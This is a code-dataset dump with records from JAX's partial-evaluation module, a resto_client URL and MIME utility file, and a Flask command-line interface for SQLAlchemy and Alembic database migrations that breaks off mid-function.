None else getvar(t) for t in out_tracers] return new_jaxpr_eqn(invars, outvars, primitive, params) def tracers_to_jaxpr(in_tracers, out_tracers): """Constructs Jaxpr given tracers for inputs and outputs. Params: in_tracers: the tracers that were created for the function inputs out_tracers: the tracers that were output by the function. Returns: a triple of a `Jaxpr`, a list of constant values corresponding to the `constvars` in the returned Jaxps, and a list of environment values. The vars for the environment values have been prepended to the Jaxpr's `invars`. """ newvar = core.gensym('') t_to_var = {} def getvar(t): var = t_to_var.get(id(t)) if var is None: aval = t.pval.get_aval() if not t.pval.is_known() else abstract_unit var = t_to_var[id(t)] = newvar(aval) return var sorted_tracers = toposort(out_tracers) invars = map(getvar, in_tracers) eqns = [] env = {} consts = {} const_to_var = {} def getconstvar(c): var = const_to_var.get(id(c)) if var is None: var = const_to_var[id(c)] = newvar(get_aval(c)) return var processed_eqn_ids = set() for t in sorted_tracers: recipe = t.recipe if isinstance(recipe, JaxprEqnRecipe): if recipe.eqn_id not in processed_eqn_ids: eqns.append(recipe_to_eqn(lambda: newvar(core.abstract_unit), getvar, recipe)) processed_eqn_ids.add(recipe.eqn_id) elif isinstance(recipe, LambdaBinding): if not any(t is in_tracer for in_tracer in in_tracers): raise core.escaped_tracer_error( "Tracer not among input tracers {}".format(t)) assert in_tracers, "Lambda binding with no args" elif isinstance(recipe, FreeVar): env[getvar(t)] = recipe.val elif isinstance(recipe, ConstVar): v = t_to_var[id(t)] = getconstvar(recipe.val) consts[v] = recipe.val elif isinstance(recipe, Literal): t_to_var[id(t)] = recipe elif recipe is unit: t_to_var[id(t)] = unitvar else: raise TypeError(recipe) env_vars, env_vals = unzip2(env.items()) const_vars, const_vals = unzip2(consts.items()) # The env_vars are pre-pended to the invars jaxpr = Jaxpr(const_vars, list(it.chain(env_vars, invars)), list(map(getvar, out_tracers)), eqns) core.skip_checks or core.check_jaxpr(jaxpr) return jaxpr, const_vals, env_vals @cache() def convert_constvars_jaxpr(jaxpr): """Moves the constvars to the start of invars.""" core.skip_checks or core.check_jaxpr(jaxpr) lifted_jaxpr = Jaxpr(constvars=(), invars=jaxpr.constvars + jaxpr.invars, outvars=jaxpr.outvars, eqns=jaxpr.eqns) core.skip_checks or core.check_jaxpr(lifted_jaxpr) return lifted_jaxpr def partial_eval_jaxpr(jaxpr: TypedJaxpr, unknowns: Sequence[bool], instantiate: Union[bool, Sequence[bool]], trace_type: Optional[Type[core.Trace]] ) -> Tuple[TypedJaxpr, TypedJaxpr, Sequence[bool]]: """Specializes a Jaxpr given an indication of which inputs are known. Returns: (jaxpr_known, jaxpr_unknown, out_unknowns). `out_unknowns` specifies which outputs are unknown (depend on some unknown inputs). `jaxpr_known` takes the same inputs as `jaxpr`, ignores the unknown inputs, and performs *all* the computation in `jaxpr` that depends only on the known inputs. Outputs correspond to those of `jaxpr`, with the unknown ones replaced with `*`, appended with the known residuals (the intermediate computations in `jaxpr` that depend only on known inputs and that are needed to compute the unknown outputs). `jaxpr_unknown` takes the same inputs as `jaxpr` along with the known residuals computed by `jaxpr_known` and returns the same outputs as `jaxpr` with the known outputs replaced by `*`. Roughly, `jaxpr(ki, ui)` is decomposed assuming `ki` and `ui` are the known and respectively unknown inputs into: jaxpr(ki, ui) = let kout, _, kresidual = jaxpr_known(kin, *) let _, uout = jaxpr_unknown(ki, ui, kresidual) in (kout, uout) For example, if `jaxpr` is lambda ki, ui: let ka = ki + 2 in (ki + 3, ui + ka)" then `jaxpr_known` = lambda ki, ui: let ka = ki + 2 in (ki + 3, *, ka) 'jaxpr_unknown` = lambda ki, ui, ka: (*, ui + ka) """ f = lu.wrap_init(core.jaxpr_as_fun(jaxpr)) cell = [] def fun(*vals): pvals = [PartialVal.unknown(aval) if uk else PartialVal.known(val) for aval, val, uk in zip(jaxpr.in_avals, vals, unknowns)] jaxpr_2, out_pvals_2, consts_2 = trace_to_jaxpr(f, pvals, instantiate=instantiate, trace_type=trace_type) out_pvs_2, out_consts_2 = unzip2(out_pvals_2) cell.append((out_pvs_2, jaxpr_2, len(consts_2))) return out_consts_2 + consts_2 # For jaxpr_known we pass core.unit for the unknown inputs, and known PartialVal for the # known inputs. pvals = [PartialVal.unknown(abstract_unit) if uk else PartialVal.unknown(aval) for aval, uk in zip(jaxpr.in_avals, unknowns)] jaxpr_1, out_pvals, consts_1 = trace_to_jaxpr(lu.wrap_init(fun), pvals, instantiate=True) (out_pvs_2, jaxpr_2, num_res), = cell assert len(jaxpr_2.constvars) == num_res # jaxpr :: a -> b # jaxpr_1 :: a1 -> [b1, res] # jaxpr_2 :: res | a2 -> b2 # jaxpr_2 :: [a2, res] -> b2 jaxpr_2 = convert_constvars_jaxpr(jaxpr_2) jaxpr_2.invars = jaxpr_2.invars[num_res:] + jaxpr_2.invars[:num_res] for var, unknown in zip(jaxpr_2.invars[:len(unknowns)], unknowns): if not unknown: var.aval = abstract_unit uk_out = [pv is not None for pv in out_pvs_2] in_avals_1, in_avals_2 = unzip2(map(_split_aval, unknowns, jaxpr.in_avals)) out_avals_1, out_avals_2 = unzip2(map(_split_aval, uk_out, jaxpr.out_avals)) # out_avals_1 and in_avals_2 need the residuals added out_pvs, _ = unzip2(out_pvals) res_avals = out_pvs[len(jaxpr.out_avals):] assert len(res_avals) == num_res out_avals_1 = out_avals_1 + res_avals in_avals_2 = in_avals_2 + res_avals typed_jaxpr_1 = TypedJaxpr(jaxpr_1, consts_1, in_avals_1, out_avals_1) typed_jaxpr_2 = TypedJaxpr(jaxpr_2, (), in_avals_2, out_avals_2) return typed_jaxpr_1, typed_jaxpr_2, uk_out def _split_aval(unknown, aval): return (abstract_unit, aval) if unknown else (aval, abstract_unit) remat_call_p = core.Primitive('remat_call') remat_call_p.call_primitive = True remat_call = partial(core.call_bind, remat_call_p) remat_call_p.def_custom_bind(remat_call) remat_call_p.def_impl(core.call_impl) remat_call_p.multiple_results = True def _remat_partial_eval(trace, _, f, tracers, params): concrete = params['concrete'] # Unlike JaxprTrace.process_call, we want to form a jaxpr for the entirety of # the function being called, not just for the unknown parts. To do that, we # instantiate all the input tracers as constants in the jaxpr being formed. # Those tracers might have concrete avals, and doing abstract interpretation # on concrete avals engenders a tradeoff: it allows data-dependent Python # control flow to work, but it can in some cases lead to redundant FLOPs (done # both in the `bind` call below and the `core.jaxpr_as_fun` call). We use the # `concrete` parameter to switch this behavior, and if `concrete` is False # then we raise the avals to the Shaped level. if concrete: instantiated_tracers = map(trace.instantiate_const, tracers) else: instantiated_tracers = map(trace.instantiate_const_abstracted, tracers) # Using the instantiated tracers, run call_bind like JaxprTrace.process_call. in_pvs, in_consts = unzip2(t.pval for t in instantiated_tracers) fun, aux = partial_eval(f, trace, in_pvs) with core.initial_style_staging(): out_flat = remat_call_p.bind(fun, *in_consts, **params) out_pvs, jaxpr, env = aux() env = map(trace.full_raise, env) out_pval_consts1, consts = split_list(out_flat, [len(out_flat)-len(jaxpr.constvars)]) out_pvals1 = [PartialVal((pv, const)) for pv, const in zip(out_pvs, out_pval_consts1)] # Since we traced with everything marked as unknown, but we need to know which # outputs are known/unknown, we use partial_eval_jaxpr to get out_unknowns. in_avals = ([raise_to_shaped(t.pval.get_aval()) for t in env] + [raise_to_shaped(pv) for pv in in_pvs]) out_avals = [raise_to_shaped(pv if pv is not None else abstract_unit if var is unitvar else get_aval(var.val) if type(var) is Literal else get_aval(const)) for var, pv, const in zip(jaxpr.outvars, out_pvs, out_pval_consts1)] typed_jaxpr = core.TypedJaxpr(jaxpr, consts, in_avals, out_avals) in_unknowns = [t.pval[0] is not None for t in it.chain(env, tracers)] jaxpr_1, jaxpr_2, out_unknowns = partial_eval_jaxpr(typed_jaxpr, in_unknowns, instantiate=False, trace_type=trace.master.trace_type) num_res = len(jaxpr_1.out_avals) - len(jaxpr_2.out_avals) # First, we prune the jaxpr to be staged out not to have too many outputs. typed_jaxpr = _dce_jaxpr(typed_jaxpr, out_unknowns) # Next, we need values for the outputs that should be known. Since consts # weren't passed through Python for evaluation, we need to evaluate jaxpr_1, # minus the residual outputs that we don't need. When `concrete=True`, as an # optimization we can avoid redoing *some* redundant FLOPs, namely those that # produced concrete avals at the output, simply by using those as computed # values. For the use case of reverse-mode ad in op-by-op ("eager mode") # evaluation, all the primal outputs should be concrete (thus not recomputed). to_compute = [not uk and type(pv) is not ConcreteArray for uk, pv in zip(out_unknowns, out_pvs)] jaxpr_1_primals = _dce_jaxpr(jaxpr_1, to_compute + [False] * num_res) _, in_consts = unzip2(t.pval for t in it.chain(env, tracers)) out_pval_consts2 = core.jaxpr_as_fun(jaxpr_1_primals)(*in_consts)[:-num_res or None] out_pvals = map(_reconstruct_pval, out_pvals1, out_pval_consts2, out_unknowns) # Now that we have out_pvals, the rest is just like JaxprTrace.process_call. instantiated_tracers = env + instantiated_tracers const_tracers = map(trace.new_instantiated_const, consts) lifted_jaxpr = convert_constvars_jaxpr(typed_jaxpr.jaxpr) out_tracers = [JaxprTracer(trace, out_pval, None) for out_pval in out_pvals] new_params = dict(params, call_jaxpr=lifted_jaxpr) eqn = new_eqn_recipe(tuple(it.chain(const_tracers, instantiated_tracers)), out_tracers, remat_call_p, new_params) for t in out_tracers: t.recipe = eqn return out_tracers call_partial_eval_rules[remat_call_p] = _remat_partial_eval def _dce_jaxpr(typed_jaxpr, outputs): # This dead-code elimination is pretty rudimentary, and in particular doesn't # nontrivially DCE through scan, call, or other higher-order primitives. # TODO(mattjj): better DCE jaxpr = typed_jaxpr.jaxpr outvars, out_avals = jaxpr.outvars, typed_jaxpr.out_avals out_pairs = [(var, aval) if output else (unitvar, core.abstract_unit) for var, aval, output in zip(outvars, out_avals, outputs)] new_outvars, new_out_avals = unzip2(out_pairs) needed_vars = {v for v in new_outvars if type(v) is not Literal} new_eqns = [] for eqn in jaxpr.eqns[::-1]: if set(eqn.outvars) & needed_vars: new_eqns.append(eqn) needed_vars.update(v for v in eqn.invars if type(v) is not Literal) new_eqns = new_eqns[::-1] new_jaxpr = core.Jaxpr(jaxpr.constvars, jaxpr.invars, new_outvars, new_eqns) return core.TypedJaxpr(new_jaxpr, typed_jaxpr.literals, typed_jaxpr.in_avals, new_out_avals) def _reconstruct_pval(pval1: PartialVal, const2: core.Value, unknown: bool): pv1, _ = pval1 if unknown or pval1.is_known(): return pval1 else: if type(pv1) is ConcreteArray: return PartialVal.known(pv1.val) else: return PartialVal.known(const2) def move_binders_to_front(typed_jaxpr: TypedJaxpr, to_move: Sequence[bool]) -> TypedJaxpr: """Reorder the `invars` to move to front the ones for which `to_move` is True.""" assert not typed_jaxpr.jaxpr.constvars assert len(typed_jaxpr.in_avals) == len(to_move) new_invars = _move_to_front(typed_jaxpr.jaxpr.invars, to_move) new_jaxpr = core.Jaxpr((), new_invars, typed_jaxpr.jaxpr.outvars, typed_jaxpr.jaxpr.eqns) new_in_avals = _move_to_front(typed_jaxpr.in_avals, to_move) new_typed_jaxpr = core.TypedJaxpr(new_jaxpr, typed_jaxpr.literals, new_in_avals, typed_jaxpr.out_avals) return new_typed_jaxpr def _move_to_front(lst: Sequence, to_move: Sequence[bool]) -> Sequence: return ([elt for elt, move in zip(lst, to_move) if move] + [elt for elt, move in zip(lst, to_move) if not move])
en
0.832567
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Partial value: either a known value or an unknown (abstract) value. Represented as a pair `(aval_opt, const)` of one of two kinds: * `(None, <Constant>)` indicates a known value, either a Python regular value, or a Tracer. * `(<AbstractValue>, *)` indicates an unknown value characterized by an abstract value. # type checks # invariant checks Get the known value, if known, else None. Get the AbstractValue either directly for unknown values, or from the known constant. Either the stored known value, or the given 'val'. # We form Jaxprs using `JaxprTrace` for three distinct purposes: # (1) to stage program representations completely out of the JAX system # (e.g. for XLA using jit or pmap). In this case we are using the # `StagingJaxprTrace` subclass. # (3) to linearize a function for reverse-mode AD. In this case we are # using the `JaxprTrace` subclass. # (2) to build a representation of a function that may require further JAX # transformations (e.g. in "initial-style" higher-order primitives, like # for control flow). In this case we use the `JaxprTrace` class. By default, if all the input tracers are known, then execute the primitive and all the ouputs are known. Otherwise, all the outputs are unknown. # The `jaxpr` already contains the env_vars at start of invars # The `jaxpr` already contains the env_vars at start of invars # The `jaxpr` already contains the env_vars at start of invars # The `jaxpr` already contains the env_vars at start of invars # See comment at top of `JaxprTrace`. This method should be reachable # only when we stage out, and in that case we drop the custom differentiation # rules, because we do not need them. # See comment in the above process_custom_jvp_call method. # This subclass is used just for its type tag (see comment for `JaxprTrace`) # This switches the behavior of process_call to stage out into the jaxpr any # call primitives encountered (rather than doing partial evaluation into the call). # might be raising abstraction level from Concrete here # TODO: can consts be traced? # instantiate=True # TODO(necula): this should return a TypedJaxpr # TODO(necula): remove stage_out, replace trace_type=pe.StagingJaxprTrace Traces a function into a Jaxpr, given PartialVals for inputs. `trace_type` can be one of `StagingJaxprTrace` or `JaxprTrace` (see comments for that class). Returns (`jaxpr`, `out_pvals`, `consts`). The `jaxpr` contains only the computation that depends on unknown inputs. The `out_pvals` are the PartialVal for the outputs. The intermediate values that depend only on known inputs and are needed to compute the output of `jaxpr` are in `consts` and are passed in as the constvars of the `jaxpr`. The handling of the known outputs depends on `instantiate`. For example, given `fun` defined as follows:: def fun(ki, ui): # ki will be a known input in this example ka = ki + 2 kb = ka + 3 return (kb, ui + ka) with `ki` the known PartialVal `1.`, and `ui` an unknown PartialVal. The only computation that depends on unknown inputs is `ui + ka` and will be the only computation in the body of the `jaxpr`. This computation depends on the known intermediate value `ka`, which will be computed statically. Currently, such constants are either embedded in the Jaxpr if they are scalars, or passed as a constvar to `jaxpr`, and then the value of the actual constant will be in `consts`: When `instantiate=False` we get:: jaxpr = { lambda ka ; ki ui. let c = add ui ka in (*, c) } # known outputs are `*` out_pvals = [known(6), unknown(ShapedArray)] # the known outputs are known PartialVal consts = [3] # the constant for `ka` When `instantiate=True` we get:: jaxpr = { lambda ka kb ; ki ui. let c = add ui ka in (kb, c) } # known output are explicit out_pvals = [abstract(ConcreteArray(6)), abstract(ShapedArray)] # all are unknown PartialVal consts = [3, 6] # values for `ka` and `kb` constvars Constructs a new JaxEqnRecipe. Params: invars: the tracers for the primitive inputs. outvars: the tracers for the primitive outputs. primitive: the primitive. params: the primitive params # TODO(necula): move these checks to core.check_jaxpr, and call in more places Constructs Jaxpr given tracers for inputs and outputs. Params: in_tracers: the tracers that were created for the function inputs out_tracers: the tracers that were output by the function. Returns: a triple of a `Jaxpr`, a list of constant values corresponding to the `constvars` in the returned Jaxps, and a list of environment values. The vars for the environment values have been prepended to the Jaxpr's `invars`. # The env_vars are pre-pended to the invars Moves the constvars to the start of invars. Specializes a Jaxpr given an indication of which inputs are known. Returns: (jaxpr_known, jaxpr_unknown, out_unknowns). `out_unknowns` specifies which outputs are unknown (depend on some unknown inputs). `jaxpr_known` takes the same inputs as `jaxpr`, ignores the unknown inputs, and performs *all* the computation in `jaxpr` that depends only on the known inputs. Outputs correspond to those of `jaxpr`, with the unknown ones replaced with `*`, appended with the known residuals (the intermediate computations in `jaxpr` that depend only on known inputs and that are needed to compute the unknown outputs). `jaxpr_unknown` takes the same inputs as `jaxpr` along with the known residuals computed by `jaxpr_known` and returns the same outputs as `jaxpr` with the known outputs replaced by `*`. Roughly, `jaxpr(ki, ui)` is decomposed assuming `ki` and `ui` are the known and respectively unknown inputs into: jaxpr(ki, ui) = let kout, _, kresidual = jaxpr_known(kin, *) let _, uout = jaxpr_unknown(ki, ui, kresidual) in (kout, uout) For example, if `jaxpr` is lambda ki, ui: let ka = ki + 2 in (ki + 3, ui + ka)" then `jaxpr_known` = lambda ki, ui: let ka = ki + 2 in (ki + 3, *, ka) 'jaxpr_unknown` = lambda ki, ui, ka: (*, ui + ka) # For jaxpr_known we pass core.unit for the unknown inputs, and known PartialVal for the # known inputs. # jaxpr :: a -> b # jaxpr_1 :: a1 -> [b1, res] # jaxpr_2 :: res | a2 -> b2 # jaxpr_2 :: [a2, res] -> b2 # out_avals_1 and in_avals_2 need the residuals added # Unlike JaxprTrace.process_call, we want to form a jaxpr for the entirety of # the function being called, not just for the unknown parts. To do that, we # instantiate all the input tracers as constants in the jaxpr being formed. # Those tracers might have concrete avals, and doing abstract interpretation # on concrete avals engenders a tradeoff: it allows data-dependent Python # control flow to work, but it can in some cases lead to redundant FLOPs (done # both in the `bind` call below and the `core.jaxpr_as_fun` call). We use the # `concrete` parameter to switch this behavior, and if `concrete` is False # then we raise the avals to the Shaped level. # Using the instantiated tracers, run call_bind like JaxprTrace.process_call. # Since we traced with everything marked as unknown, but we need to know which # outputs are known/unknown, we use partial_eval_jaxpr to get out_unknowns. # First, we prune the jaxpr to be staged out not to have too many outputs. # Next, we need values for the outputs that should be known. Since consts # weren't passed through Python for evaluation, we need to evaluate jaxpr_1, # minus the residual outputs that we don't need. When `concrete=True`, as an # optimization we can avoid redoing *some* redundant FLOPs, namely those that # produced concrete avals at the output, simply by using those as computed # values. For the use case of reverse-mode ad in op-by-op ("eager mode") # evaluation, all the primal outputs should be concrete (thus not recomputed). # Now that we have out_pvals, the rest is just like JaxprTrace.process_call. # This dead-code elimination is pretty rudimentary, and in particular doesn't # nontrivially DCE through scan, call, or other higher-order primitives. # TODO(mattjj): better DCE Reorder the `invars` to move to front the ones for which `to_move` is True.
1.810279
2
resto_client/functions/utils.py
CNES/resto_client
6
6627902
<filename>resto_client/functions/utils.py<gh_stars>1-10 # -*- coding: utf-8 -*- """ .. admonition:: License Copyright 2019 CNES Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from mimetypes import guess_extension, MimeTypes from typing import Optional, Tuple, Union from urllib.parse import urlparse, urlunparse def contract_url(full_url: str) -> str: """ Contract a url to appear with ... :param full_url: full url to contract for printing :returns: contracted url """ url_lst = list(urlparse(full_url)) # delete params, query and fragment for i in [3, 4, 5]: url_lst[i] = '' # reduce url : path parts path_parts = url_lst[2].split('/') url_lst[2] = '/'.join((path_parts[0], '...', path_parts[-2], path_parts[-1])) contracted_url = urlunparse(url_lst) return contracted_url def is_valid_url(url: str) -> bool: """ Validate if the passed argument looks like a valid url. :param url: url to check :returns: True if the argument looks like a valid URL """ try: result = urlparse(url) return all([result.scheme, result.netloc]) except ValueError: return False def get_file_properties(content_type: str) -> Tuple[Optional[str], str, Union[str, None]]: """ Guess proper extension to use, even if charset is present in content_type and return correct content_type and encoding :param content_type: content_type stripped to check :returns: the file extension, mimetype and encoding """ mimetype = content_type split_content = content_type.split(';') for kind_of_mimetype in MimeTypes().types_map_inv: for key in kind_of_mimetype: if content_type.startswith(key): mimetype = key encoding = None if len(split_content) > 1: encoding = split_content[1] if '=' in encoding: split_encoding = split_content[1].split('=') if split_encoding[0].strip().lower() == 'charset': encoding = split_encoding[1] return (guess_extension(mimetype), mimetype, encoding)
<filename>resto_client/functions/utils.py<gh_stars>1-10 # -*- coding: utf-8 -*- """ .. admonition:: License Copyright 2019 CNES Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from mimetypes import guess_extension, MimeTypes from typing import Optional, Tuple, Union from urllib.parse import urlparse, urlunparse def contract_url(full_url: str) -> str: """ Contract a url to appear with ... :param full_url: full url to contract for printing :returns: contracted url """ url_lst = list(urlparse(full_url)) # delete params, query and fragment for i in [3, 4, 5]: url_lst[i] = '' # reduce url : path parts path_parts = url_lst[2].split('/') url_lst[2] = '/'.join((path_parts[0], '...', path_parts[-2], path_parts[-1])) contracted_url = urlunparse(url_lst) return contracted_url def is_valid_url(url: str) -> bool: """ Validate if the passed argument looks like a valid url. :param url: url to check :returns: True if the argument looks like a valid URL """ try: result = urlparse(url) return all([result.scheme, result.netloc]) except ValueError: return False def get_file_properties(content_type: str) -> Tuple[Optional[str], str, Union[str, None]]: """ Guess proper extension to use, even if charset is present in content_type and return correct content_type and encoding :param content_type: content_type stripped to check :returns: the file extension, mimetype and encoding """ mimetype = content_type split_content = content_type.split(';') for kind_of_mimetype in MimeTypes().types_map_inv: for key in kind_of_mimetype: if content_type.startswith(key): mimetype = key encoding = None if len(split_content) > 1: encoding = split_content[1] if '=' in encoding: split_encoding = split_content[1].split('=') if split_encoding[0].strip().lower() == 'charset': encoding = split_encoding[1] return (guess_extension(mimetype), mimetype, encoding)
en
0.777408
# -*- coding: utf-8 -*- .. admonition:: License Copyright 2019 CNES Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Contract a url to appear with ... :param full_url: full url to contract for printing :returns: contracted url # delete params, query and fragment # reduce url : path parts Validate if the passed argument looks like a valid url. :param url: url to check :returns: True if the argument looks like a valid URL Guess proper extension to use, even if charset is present in content_type and return correct content_type and encoding :param content_type: content_type stripped to check :returns: the file extension, mimetype and encoding
2.194863
2
flex/db/cli.py
centergy/flex
0
6627903
<filename>flex/db/cli.py<gh_stars>0 import os import argparse from flex.core.cli import Manager, prompt_bool from .utils import app_get_db_client from flask import current_app from .migrations import Config, migrations from alembic import command console = Manager(usage="Perform SQL database migrations and operations with SQLAlchemy.") @console.command def createdb(binds=None): """Creates the configured database and tables from sqlalchemy models.""" binds = () if binds is None else binds.split(',') _dbclient().create_database(*binds) @console.command def dropdb(binds=None): """Drops the current sqlalchemy database.""" binds = () if binds is None else binds.split(',') if prompt_bool("Sure you want to drop the database?"): _dbclient().drop_database(*binds) # @console.command # def recreatedb(create_tables=True, drop_tables=False): # """Recreates the database and tables (same as issuing 'drop_db' and then 'create_db').""" # dropdb(drop_tables) # createdb(create_tables) # @console.command # def createtables(): # """Creates the configured database and tables from sqlalchemy models.""" # _dbclient().create_all() @console.command def droptables(): """Drops the current sqlalchemy database.""" if prompt_bool("Sure you want to drop all tables in the database?"): _dbclient().drop_all() # @console.command # def recreatetables(): # """Recreates database tables (same as issuing 'drop_tables' and then 'create_tables').""" # droptables() # createtables() def _dbclient(app=None): return app_get_db_client(app or current_app) @console.option('-d', '--directory', dest='directory', default=None, help="migration script directory (default is '.migrations')") @console.option('--multidb', dest='multidb', action='store_true', default=False, help="Multiple databases migraton (default is False)") def init(directory=None, multidb=False): """Creates a new migration repository""" createdb() if directory is None: directory = migrations.directory config = Config() config.set_main_option('script_location', directory) config.config_file_name = os.path.join(directory, 'alembic.ini') config = migrations.migrate.call_configure_callbacks(config) if multidb: command.init(config, directory, 'flex-multidb') else: command.init(config, directory, 'flex') @console.option('--rev-id', dest='rev_id', default=None, help=('Specify a hardcoded revision id instead of generating one')) @console.option('--version-path', dest='version_path', default=None, help=('Specify specific path from config for version file')) @console.option('--branch-label', dest='branch_label', default=None, help=('Specify a branch label to apply to the new revision')) @console.option('--splice', dest='splice', action='store_true', default=False, help=('Allow a non-head revision as the "head" to splice onto')) @console.option('--head', dest='head', default='head', help=('Specify head revision or <branchname>@head to base new revision on')) @console.option('--sql', dest='sql', action='store_true', default=False, help=("Don't emit SQL to database - dump to standard output instead")) @console.option('--autogenerate', dest='autogenerate', action='store_true', default=False, help=('Populate revision script with candidate migration operations, based on comparison of database to model')) @console.option('-m', '--message', dest='message', default=None, help='Revision message') @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def revision(directory=None, message=None, autogenerate=False, sql=False, head='head', splice=False, branch_label=None, version_path=None, rev_id=None): """Create a new revision file.""" config = migrations.migrate.get_config(directory) command.revision(config, message, autogenerate=autogenerate, sql=sql, head=head, splice=splice, branch_label=branch_label, version_path=version_path, rev_id=rev_id ) @console.option('--rev-id', dest='rev_id', default=None, help=('Specify a hardcoded revision id instead of generating one')) @console.option('--version-path', dest='version_path', default=None, help=('Specify specific path from config for version file')) @console.option('--branch-label', dest='branch_label', default=None, help=('Specify a branch label to apply to the new revision')) @console.option('--splice', dest='splice', action='store_true', default=False, help=('Allow a non-head revision as the "head" to splice onto')) @console.option('--head', dest='head', default='head', help=('Specify head revision or <branchname>@head to base new revision on')) @console.option('--sql', dest='sql', action='store_true', default=False, help=("Don't emit SQL to database - dump to standard output instead")) @console.option('-m', '--message', dest='message', default=None) @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def migrate(directory=None, message=None, sql=False, head='head', splice=False, branch_label=None, version_path=None, rev_id=None): """Alias for 'revision --autogenerate'""" config = migrations.migrate.get_config(directory, opts=['autogenerate']) command.revision(config, message, autogenerate=True, sql=sql, head=head, splice=splice, branch_label=branch_label, version_path=version_path, rev_id=rev_id ) @console.option('revision', nargs='?', default='head', help="revision identifier") @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def edit(directory=None, revision='current'): """Edit current revision.""" config = migrations.migrate.get_config(directory) command.edit(config, revision) @console.option('--rev-id', dest='rev_id', default=None, help=('Specify a hardcoded revision id instead of generating one')) @console.option('--branch-label', dest='branch_label', default=None, help=('Specify a branch label to apply to the new revision')) @console.option('-m', '--message', dest='message', default=None) @console.option('revisions', nargs='+', help='one or more revisions, or "heads" for all heads') @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def merge(directory=None, revisions='', message=None, branch_label=None, rev_id=None): """Merge two revisions together. Creates a new migration file""" config = migrations.migrate.get_config(directory) command.merge(config, revisions, message=message, branch_label=branch_label, rev_id=rev_id) @console.option('--tag', dest='tag', default=None, help=("Arbitrary 'tag' name - can be used by custom env.py scripts")) @console.option('--sql', dest='sql', action='store_true', default=False, help=("Don't emit SQL to database - dump to standard output instead")) @console.option('revision', nargs='?', default='head', help="revision identifier") @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) @console.option('-x', '--x-arg', dest='x_arg', default=None, action='append', help=("Additional arguments consumed by custom env.py scripts")) def upgrade(directory=None, revision='head', sql=False, tag=None, x_arg=None): """Upgrade to a later version""" config = migrations.migrate.get_config(directory, x_arg=x_arg) command.upgrade(config, revision, sql=sql, tag=tag) @console.option('--tag', dest='tag', default=None, help=("Arbitrary 'tag' name - can be used by custom env.py scripts")) @console.option('--sql', dest='sql', action='store_true', default=False, help=("Don't emit SQL to database - dump to standard output instead")) @console.option('revision', nargs='?', default="-1", help="revision identifier") @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) @console.option('-x', '--x-arg', dest='x_arg', default=None, action='append', help=("Additional arguments consumed by custom env.py scripts")) def downgrade(directory=None, revision='-1', sql=False, tag=None, x_arg=None): """Revert to a previous version""" config = migrations.migrate.get_config(directory, x_arg=x_arg) if sql and revision == '-1': revision = 'head:-1' command.downgrade(config, revision, sql=sql, tag=tag) @console.option('revision', nargs='?', default="head", help="revision identifier") @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def show(directory=None, revision='head'): """Show the revision denoted by the given symbol.""" config = migrations.migrate.get_config(directory) command.show(config, revision) @console.option('-v', '--verbose', dest='verbose', action='store_true', default=False, help='Use more verbose output') @console.option('-r', '--rev-range', dest='rev_range', default=None, help='Specify a revision range; format is [start]:[end]') @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def history(directory=None, rev_range=None, verbose=False): """List changeset scripts in chronological order.""" config = migrations.migrate.get_config(directory) command.history(config, rev_range, verbose=verbose) @console.option('--resolve-dependencies', dest='resolve_dependencies', action='store_true', default=False, help='Treat dependency versions as down revisions') @console.option('-v', '--verbose', dest='verbose', action='store_true', default=False, help='Use more verbose output') @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def heads(directory=None, verbose=False, resolve_dependencies=False): """Show current available heads in the script directory""" config = migrations.migrate.get_config(directory) command.heads(config, verbose=verbose, resolve_dependencies=resolve_dependencies) @console.option('-v', '--verbose', dest='verbose', action='store_true', default=False, help='Use more verbose output') @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def branches(directory=None, verbose=False): """Show current branch points""" config = migrations.migrate.get_config(directory) command.branches(config, verbose=verbose) @console.option('--head-only', dest='head_only', action='store_true', default=False, help='Deprecated. Use --verbose for additional output') @console.option('-v', '--verbose', dest='verbose', action='store_true', default=False, help='Use more verbose output') @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def current(directory=None, verbose=False, head_only=False): """Display the current revision for each database.""" config = migrations.migrate.get_config(directory) command.current(config, verbose=verbose, head_only=head_only) @console.option('--tag', dest='tag', default=None, help=("Arbitrary 'tag' name - can be used by custom env.py scripts")) @console.option('--sql', dest='sql', action='store_true', default=False, help=("Don't emit SQL to database - dump to standard output instead")) @console.option('revision', default=None, help="revision identifier") @console.option('-d', '--directory', dest='directory', default=None, help=("migration script directory (default is 'migrations')")) def stamp(directory=None, revision='head', sql=False, 